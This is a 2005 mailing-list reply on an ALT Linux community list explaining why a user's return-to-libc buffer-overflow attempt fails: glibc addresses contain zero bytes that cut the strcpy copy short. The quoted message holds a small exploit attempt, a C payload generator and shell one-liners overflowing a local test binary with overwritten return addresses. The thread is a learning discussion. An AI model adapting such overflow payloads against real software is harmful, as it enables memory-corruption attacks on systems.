[Comm-en] System call via buffer overflow not working

Egor Grebnev egor at altlinux.ru
Mon Jan 24 23:20:47 MSK 2005


A small comment from Dmitry Levin, a lead developer who isn't subscribed 
to this mailing list yet.

I hope that the original meaning hasn't been lost during translation 
from Russian ;-)

The technique that you are trying to master is called return-to-libc. It 
is a bit more complex since in the string view the function addresses 
from our glibc are zero bytes. As a result, strcpy in your sample only 
copies a part of the string, and the sample doesn't work.

You can make a Google search on this topic, many things were written 
about it some time ago.

Aaron McDonald wrote:

> Here are the typo fixes from my previous email:
> //makehex.c
> main() {
>        char pad[524];
>        int i;
>        for (i=0; i < 524; i++)
>                pad[i] = 'A';
>        pad[524]='\0';
>        printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad);
> }
> ./vulner1 $(perl -e 'print "A"x524')$(printf
> "\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf")
>     or
> ./vulner1 $(./makehex)     //don't forget to update and recompile makehex
> _______________________________________________
> Community-en mailing list
> Community-en at altlinux.org
> https://lists.altlinux.org/mailman/listinfo/community-en

More information about the community-en mailing list